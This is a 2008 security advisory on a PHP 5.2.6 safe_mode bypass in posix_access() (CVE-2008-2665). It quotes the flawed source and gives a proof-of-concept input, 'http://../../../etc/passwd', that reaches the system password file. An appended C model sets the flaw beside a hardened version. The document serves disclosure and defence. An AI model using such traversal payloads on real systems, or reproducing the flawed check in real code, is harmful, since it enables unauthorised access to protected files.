[PHP 5.2.6 posix_access() (posix ext) safe_mode bypass]

Author: Maksymilian Arciemowicz (cXIb8O3)
SecurityReason.com

Date:
- Written: 10.05.2008
- Public: 17.06.2008

SecurityReason Research
SecurityAlert Id: 54
CVE: CVE-2008-2665
CWE: CWE-264
SecurityRisk: Low

Affected Software: PHP 5.2.6

Advisory URL: http://securityreason.com/achievement_securityalert/54
Vendor: http://www.php.net

--- 0. Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

posix_access - Determine accessibility of a file

SYNOPSIS:
bool posix_access ( string $file [, int $mode ] )

http://pl2.php.net/manual/pl/function.posix-access.php

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX.
SECURITYREASON WILL NOT LIST ALL VULNERABLE FUNCTIONS

--- 1. PHP 5.2.6 posix_access() safe_mode bypass ---

Let's look at the posix_access() function:

---
PHP_FUNCTION(posix_access)
{
    long mode = 0;
    int filename_len, ret;
    char *filename, *path;

    if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|l", &filename, &filename_len, &mode) == FAILURE) {
        RETURN_FALSE;
    }

    /* canonicalised form of the user-supplied name */
    path = expand_filepath(filename, NULL TSRMLS_CC);
    if (!path) {
        POSIX_G(last_error) = EIO;
        RETURN_FALSE;
    }

    /* open_basedir is checked against path, but the safe_mode check
     * is run on the raw filename, not on path */
    if (php_check_open_basedir_ex(path, 0 TSRMLS_CC) ||
            (PG(safe_mode) && (!php_checkuid_ex(filename, NULL, CHECKUID_CHECK_FILE_AND_DIR, CHECKUID_NO_ERRORS)))) {
        efree(path);
        POSIX_G(last_error) = EPERM;
        RETURN_FALSE;
    }

    /* the actual access test uses the canonicalised path */
    ret = access(path, mode);
    efree(path);

    if (ret) {
        POSIX_G(last_error) = errno;
        RETURN_FALSE;
    }

    RETURN_TRUE;
}
---

var_dump(posix_access("http://../../../etc/passwd")); // bool(true)
var_dump(posix_access("/etc/passwd"));                // bool(false)

Why?

Because path = expand_filepath(filename, NULL TSRMLS_CC); turns "http://../../../etc/passwd" into path = "/etc/passwd", whereas the safe_mode check

    (PG(safe_mode) && (!php_checkuid_ex(filename, NULL, CHECKUID_CHECK_FILE_AND_DIR, CHECKUID_NO_ERRORS)))

is run on the original string "http://../../../etc/passwd". php_checkuid_ex() sees the http:// prefix and lets the name through, while access() is then called on /etc/passwd, so safe_mode is bypassed.

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX.
SECURITYREASON WILL NOT LIST ALL VULNERABLE FUNCTIONS

--- 2. How to Fix ---

Do not rely on safe_mode as your main protection.

--- 3. Greets ---

sp3x
Infospec
schain
p_e_a
Chujwamwdupe

--- 4. Contact ---

Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
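Appendix (added example, not part of the advisory or of PHP's source): the C model below reproduces the check/use mismatch from section 1 and places a hardened variant beside it. ALLOWED_DIR, MODEL_CWD, canonical() and policy_allows() are constructed stand-ins for expand_filepath() and php_checkuid_ex(); the hardened version simply hands the check the same canonical path that access() receives.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#define ALLOWED_DIR "/var/www/"    /* constructed policy: only this tree is local-accessible */
#define MODEL_CWD   "/var/www/app" /* constructed current directory */

/* Stand-in for expand_filepath(): PHP 5.2.6 turned "http://../../../etc/passwd" into
 * "/etc/passwd" (scheme gone, ".." collapsed against the cwd). Static buffer, demo only. */
const char *canonical(const char *name) {
    static char out[512];
    char buf[512], *parts[64];
    int n = 0;
    if (strncmp(name, "http://", 7) == 0) name += 7;
    snprintf(buf, sizeof buf, "%s/%s", name[0] == '/' ? "" : MODEL_CWD, name);
    for (char *tok = strtok(buf, "/"); tok; tok = strtok(NULL, "/")) {
        if (strcmp(tok, "..") == 0) { if (n > 0) n--; }
        else if (strcmp(tok, ".") != 0 && n < 64) parts[n++] = tok;
    }
    size_t used = 0;
    out[0] = '\0';
    for (int i = 0; i < n && used < sizeof out; i++)
        used += snprintf(out + used, sizeof out - used, "/%s", parts[i]);
    return n > 0 ? out : "/";
}

/* Model of the safe_mode check as the advisory describes it: a name carrying a URL
 * scheme is treated as remote and waved through, a local path must lie under ALLOWED_DIR.
 * (php_checkuid_ex() really compares ownership; what matters is which string it gets.) */
bool policy_allows(const char *name) {
    if (strstr(name, "://") != NULL) return true;
    return strncmp(name, ALLOWED_DIR, strlen(ALLOWED_DIR)) == 0;
}

/* PHP 5.2.6 pattern: the check sees the raw name, access() sees the canonical path. */
bool access_vulnerable(const char *name) {
    canonical(name);            /* access(path, mode) would run on this result */
    return policy_allows(name); /* but the raw name is what gets checked */
}

/* Hardened pattern: check and use operate on the same canonical path. */
bool access_hardened(const char *name) {
    return policy_allows(canonical(name));
}

int main(void) {
    const char *p = "http://../../../etc/passwd";
    printf("%s -> %s vuln=%d hard=%d\n", p, canonical(p), access_vulnerable(p), access_hardened(p));
    return 0;
}
```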